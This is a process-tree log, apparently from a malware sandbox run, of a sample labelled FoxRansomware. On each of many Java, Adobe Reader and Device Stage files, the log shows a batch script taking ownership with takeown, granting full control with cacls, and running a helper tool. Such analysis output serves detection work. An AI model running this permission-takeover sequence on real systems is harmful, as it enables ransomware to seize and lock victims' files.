C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "classes.jsa" -nobanner3⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "classes.jsa" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "background.png" -nobanner3⤵PID:268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "background.png" -nobanner4⤵PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:3028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:3704
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:2724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:2712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:3728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:3764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵PID:2936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "device.png" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "device.png" -nobanner4⤵PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:4036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:3864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:2192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:1696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:2240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tasks.xml" -nobanner3⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tasks.xml" -nobanner4⤵PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:3252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:1456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "superbar.png" -nobanner3⤵PID:3400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "superbar.png" -nobanner4⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:324
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:2460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:2516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:2848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:2528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:3692
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:2852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:1588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:3612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "create_form.gif" -nobanner3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "create_form.gif" -nobanner4⤵PID:1928
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:3000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:3724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "info.gif" -nobanner3⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "info.gif" -nobanner4⤵PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:3436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:3188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:1780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:3628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "trash.gif" -nobanner3⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "trash.gif" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:3352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:2636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:3016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:2456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:3660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:2920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:3836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:2468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:2064
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:3200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "can.hyp" -nobanner3⤵PID:2912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "can.hyp" -nobanner4⤵PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:2052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:3308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa37.hyp" -nobanner3⤵PID:3564
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "usa37.hyp" -nobanner4⤵PID:2092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:2484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:3800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:3952
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "overlay.png" -nobanner3⤵PID:2012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "overlay.png" -nobanner4⤵PID:296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:2136
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:3776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:2156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:3156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:3100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:4064
-
